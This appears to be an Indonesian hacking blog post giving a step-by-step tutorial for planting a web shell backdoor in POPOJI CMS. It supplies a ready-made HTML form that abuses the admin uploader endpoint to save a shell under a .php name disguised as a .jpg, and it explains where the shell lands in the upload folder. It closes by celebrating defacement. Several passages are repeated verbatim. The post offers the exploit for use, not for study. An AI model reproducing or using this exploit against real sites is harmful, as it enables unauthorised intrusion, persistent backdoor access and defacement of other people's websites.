okey kita akan bahas disini, bagaimana meng-upload sebuah backdoor di POPOJI CMS
Pertama ente harus sudah mendapatkan akses Login sebagai admin di web target !!
kalo sudah punya akun admin yang sudah terverif/aktif silahkan ente login , sampai muncul ke page Dashbor admin
kalo dah Login, langsung buka URL bug/vuln di:
target.c0li/po-admin/js/plugins/uploader/upload.php
Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
target.c0li/po-admin/js/plugins/uploader/upload.php
Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
CSRF Code:
<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_ente.php">
<input type="submit" value="exploit">
</form>
* save dgn ekstensi .html
* lalu bukak dengan browser kalean.
upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellente.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa.
<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_ente.php">
<input type="submit" value="exploit">
</form>
* save dgn ekstensi .html
* lalu bukak dengan browser kalean.
upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellente.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa.
Terus cara tau Letak Shell nya ?
buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..
akses shell:
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php
Hahaha, gak afdol yee ngeXploit tanpa tau cara bangunnye, Silahkan Baca artikel yg dulu Nue post di Blog ini: Tutorial Instalasi CMS Popoji
Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan ?
Having Deface :V
Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan ?
Having Deface :V
No comments:
Post a Comment